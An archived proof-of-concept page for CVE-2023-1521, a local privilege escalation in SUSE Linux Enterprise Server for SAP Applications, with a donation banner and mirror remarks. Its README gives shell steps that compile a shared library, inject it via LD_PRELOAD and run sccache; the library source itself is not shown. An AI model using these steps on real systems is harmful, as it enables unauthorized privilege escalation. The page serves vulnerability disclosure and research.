Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-1521 PoC — SUSE Linux Enterprise Server for SAP Applications 安全漏洞

Source
Associated Vulnerability
Title:SUSE Linux Enterprise Server for SAP Applications 安全漏洞 (CVE-2023-1521)
Description:SUSE Linux Enterprise Server for SAP Applications是德国SUSE公司的一组软件和服务。可满足 SAP 用户的特定需求。 SUSE Linux Enterprise Server for SAP Applications存在安全漏洞,该漏洞源于存在本地权限升级问题。
Readme
## PoC

```bash
gcc -shared -o libpoc.so poc.c -fPIC
export LD_PRELOAD=fullpath_to_libpoc.so
sccache gcc foo.c -o foo
```
File Snapshot

[4.0K] /data/pocs/7c59d29211262a4f296006c8f93809d91c4c4aa3 ├── [ 78] foo.c ├── [ 472] poc.c └── [ 121] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.